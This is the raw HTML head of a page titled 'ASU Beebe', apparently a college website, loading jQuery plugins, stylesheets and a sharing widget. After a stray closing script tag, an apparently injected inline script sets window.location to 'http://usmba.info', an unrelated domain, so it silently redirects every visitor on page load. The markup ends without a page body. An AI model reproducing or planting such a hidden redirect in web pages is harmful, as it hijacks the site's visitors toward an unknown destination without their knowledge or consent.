<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

	<title>ASU Beebe</title>
	<script type='text/javascript' src='http://www.asub.edu/assets/js/jquery-1.9.0.min.js'></script>
	<link rel="shortcut icon" href="http://www.asub.edu/assets/images/favicon.ico" type="image/x-icon">
	<link rel="stylesheet" type="text/css" href="http://www.asub.edu/assets/css/blue-style.css" />
	<link rel="stylesheet" type="text/css" href="http://www.asub.edu/assets/css/ss-gizmo.css" />
	<link rel="stylesheet" type="text/css" href="http://www.asub.edu/assets/css/jquery.dataTables.css" />
	<link href="http://www.asub.edu/assets/css/jquery.tweet.css" media="all" rel="stylesheet" type="text/css"/> 
	<script type="text/javascript" language="javascript" src="http://www.asub.edu/assets/js/jquery.dataTables.js"></script>
	<script type="text/javascript" src="http://www.asub.edu/assets/js/jquery.cycle.lite.js"></script>
	<script type="text/javascript" src="http://www.asub.edu/assets/js/idTabs.min.js"></script>
	<script language="javascript" src="http://www.asub.edu/assets/js/jquery.tweet.js" type="text/javascript"></script>
	<script language="javascript" src="http://www.asub.edu/assets/js/ss-gizmo.js" type="text/javascript"></script>
	<script language="javascript" src="http://www.asub.edu/assets/js/jquery.qtip.js" type="text/javascript"></script>
	

	<script type="text/javascript">var switchTo5x=true;</script>
	<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
	<script type="text/javascript">stLight.options({publisher: "c962b920-1fa5-4800-92b9-a418139321fc", doNotHash: false, doNotCopy: false, hashAddressBar: false});</script>
	<link href='http://www.asub.edu/assets/fullcalendar/fullcalendar.css' rel='stylesheet' />
	<link href='http://www.asub.edu/assets/css/jquery.qtip.css' rel='stylesheet' />
	<link href='http://www.asub.edu/assets/fullcalendar/fullcalendar.print.css' rel='stylesheet' media='print' />
		<script src='http://www.asub.edu/assets/fullcalendar/fullcalendar.js'></script>


  </script>
<script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script> 
